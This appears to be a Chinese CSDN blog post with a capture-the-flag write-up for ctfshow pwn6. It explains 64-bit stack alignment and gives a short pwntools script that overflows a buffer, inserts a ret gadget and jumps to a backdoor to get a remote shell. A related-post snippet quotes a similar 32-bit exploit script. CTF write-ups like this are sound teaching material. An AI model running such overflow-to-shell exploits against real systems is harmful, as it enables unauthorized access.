ctfshow pwn6

最新推荐文章于 2024-04-15 23:47:01 发布
最新推荐文章于 2024-04-15 23:47:01 发布
阅读量401 收藏 1
点赞数
分类专栏: ctfshow pwn详细wp 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39980610/article/details/126462903
版权

已经提示了是pwn05的64位版

所以exp基本一样但是要注意栈平衡

 

Bash
 

  •  
    函数栈平衡:保证函数调用前后的栈顶是一致的
     
  •  
    1.外平栈:由函数外部保持栈平衡
     
    2.内平栈:由函数内部保持栈平衡
     
    其实就是要进出都是esp(32位)
     
    或者简单理解为函数要正确退出
     
    exp:
     
    from pwn import*
r=remote("pwn.challenge.ctf.show", 28176)
#r=process("./pwn06")
backdoor=0x400577
retn=0x40058e
payload=b"a"*(0xc+8)+p64(retn)+p64(backdoor)
r.sendline(payload)
r.interactive()
     
     
 

 

                

        

        

    




    

      

        

            

              
                
                  whit233
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
2021-鹏城实验室-pwn-babyheap.zip

				
			

			

				

					09-28
				

			

		

		

			
				
在"Pwn-BabyHeap"中,提供的libc.so.6文件是静态编译的库文件,我们可以对其进行分析,寻找关键函数的地址,这对于构造payload至关重要。同时,我们需要分析babyheap程序的行为,理解其内存管理机制,找到合适的漏洞...

			
		

	



                

              
                



	

		

			

				
					
ctfshow pwn 06

				
			

			

				

					A2247328295的博客
				

				

					04-14
					
					219
					
				

			

		

		

			
				
这里需要将payload的先指向retn的地址维持堆栈平衡,最后添加函数的首地址。exp很简单就不解释了,当然这里还可以这样实现,我们直接将地址指向 bin/sh。welcome函数和main函数就不看了,直接看getflag函数。在调用函数时,保证esp能正确恢复入栈之前的状态。可以看到这是一个64位的程序,需要考虑堆栈平衡。

			
		

	



                


  
              

                


	

		

			

				
					
pwn06(关于64位程序堆栈平衡的处理)

				
			

			

				

					Welcome To Myon'Blog !
				

				

					07-07
					
					908
					
				

			

		

		

			
				
堆栈平衡:

当我们在堆栈中进行堆栈的操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入栈中的地址,函数执行到ret执行之前,堆栈栈顶的地址 一定要是call指令的下一个地址。

			
		

	





	

		

			

				
					
CTFshow-PWN-前置基础(pwn6-pwn9)

					
最新发布

				
			

			

				

					Welcome To Myon'Blog !
				

				

					04-15
					
					468
					
				

			

		

		

			
				
立即寻址方式结束后eax寄存器的值为?截取关键代码mov 用于赋值,将右边立即数加载到左边的寄存器 eax 中;add 将寄存器 eax 中的值与立即数 114504 相加,并将结果存储回寄存器eax中;sub 从寄存器eax中的值中减去1,并将结果存储回寄存器eax中。

			
		

	



		

			
		



	

		

			

				
					
ctfshow pwn

				
			

			

				

					zip471642048的博客
				

				

					06-04
					
					433
					
				

			

		

		

			
				
ctfshow pwn系列

			
		

	





	

		

			

				
					
x86_64汇编中的栈平衡(内平栈外平栈)附od反汇编图解

				
			

			

				

					小手琴师的博客
				

				

					11-06
					
					3593
					
				

			

		

		

			
				
目录push 入栈pop 出栈
首先介绍占空间用到的几个寄存器
ESP   栈顶指针  (extended stack pointer)英文直译是:扩展栈指针
EBP  栈底指针 ,指的是本层call子程序的栈底,就是最上层call的栈底。不是整个栈空间的栈底  (extended base pointer)英文直译是扩展基址指针
push 入栈
push eax  等价于 sub esp , 4   mov [esp],eax  把eax压入栈等价于  县 让esp栈指针 - 4 ,然后把 eax的值存入

			
		

	





	

		

			

				
					
2024NKCTF-pwn

				
			

			

				

					03-25
				

			

		

		

			
				
2024NKCTF_pwn

			
		

	





	

		

			

				
					
welpwn pwn 入门题

				
			

			

				

					02-11
				

			

		

		

			
				
pwn 入门题

			
		

	





	

		

			

				
					
PWN.rar_PWN

				
			

			

				

					09-24
				

			

		

		

			
				
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...

			
		

	





	

		

			

				
					
pwn ubuntu18的运行环境自己搭建

				
			

			

				

					11-15
				

			

		

		

			
				
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334

			
		

	





	

		

			

				
					
【汇编】堆栈平衡、外平栈与内平栈

				
			

			

				

					qq_52572621的博客
				

				

					09-07
					
					3036
					
				

			

		

		

			
				
如果要返父程序,则当我们在堆栈中进行堆栈操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入堆栈中的地址。也就是说我们的call指令调用函数之后,他的下一个地址会push到堆栈中,我们在函数中无论怎么操作堆栈,ret返回前堆栈必须指向的是call指令压入的地址。(这里我们假设函数参数不会操作堆栈,只是函数内容操作堆栈) 如果通过堆栈传递参数,那么函数执行完毕之后,要平衡参数导致的堆栈变化。

			
		

	





	

		

			

				
					
【逆向工程】C/C++的反汇编表示详解(1)函数调用,栈平衡,变量与参数的内存布局

				
			

			

				

					L2510408497的博客
				

				

					07-06
					
					3672
					
				

			

		

		

			
				
很多人学完汇编,去看C/C++的反汇编就会很懵,发现单独看一条指令看的明明白白,但连在多条指令连在一起就不知道有什么作用了,如

push        ebp
mov         	ebp,esp
sub         esp,40h
lea         edi,[ebp-40h]
mov         ecx,10h
mov         eax,0CCCCCCCCh
rep stos    dword ptr [edi]

这里用VC6.0是最好的,更能看出本质,VS系列也可以,VS的话

			
		

	





	

		

			

				
					
BugkuCTF-PWN题pwn6-printf超详细讲解(未提供Libc版本)

				
			

			

				

					am_03的博客
				

				

					08-31
					
					1062
					
				

			

		

		

			
				
查看文件类型:

查看保护机制:

IDA64位打开:
伪码:

查看子程序:



case 2:


case 3:


case 1:





			
		

	





	

		

			

				
					
ctfshow刷题笔记(pwn篇)

				
			

			

				

					Gygert的博客
				

				

					03-16
					
					3443
					
				

			

		

		

			
				
一入pwn坑深似海,从此web是路人
目录pwn02pwn03
pwn02
常规checksec一下

扔进IDA

点进pwnme()函数看看,明显的栈溢出

搜索字符串有/bin/sh

直接淦它
from pwn import*
io=remote('111.231.70.44',28054)
#io=process('./pwn02')
bin_sh=0x0804850F
payload=b'a'*13+p32(bin_sh)
io.sendline(payload)
io.interactive(

			
		

	





	

		

			

				
					
pwn刷题num31----ret2libc + 栈平衡

				
			

			

				

					tbsqigongzi的博客
				

				

					04-27
					
					198
					
				

			

		

		

			
				
BUUCTF-PWN-ciscn_2019_en_2

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行


64位程序,小端序
开启部分RELRO-----got表仍可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

好熟悉,遇到原题了
见我另一篇文章
pwn刷题num24----ret2libc + 栈平衡

...

			
		

	





	

		

			

				
					
CTFshow-pwn入门-前置基础pwn5 - pwn12

				
			

			

				

					T1ngSh0w的博客
				

				

					06-17
					
					1162
					
				

			

		

		

			
				
CTFshow-pwn入门-前置基础-pwn5-pwn12

			
		

	





	

		

			

				
					
BUUCTF ciscn_2019_c_1栈平衡解释

				
			

			

				

					qq_51904308的博客
				

				

					05-13
					
					126
					
				

			

		

		

			
				
BUUCTF ciscn_2019_c_1栈平衡解释

			
		

	





	

		

			

				
					
pwn刷题num24----ret2libc + 栈平衡

				
			

			

				

					tbsqigongzi的博客
				

				

					04-26
					
					1160
					
				

			

		

		

			
				
BUUCTF-PWN-ciscn_2019_c_1

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----可能存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接


运行程序后,有三个选择,
欢迎来到这台加密机 

1.加密 
2.解密
3.退出

选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。
ida看一

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值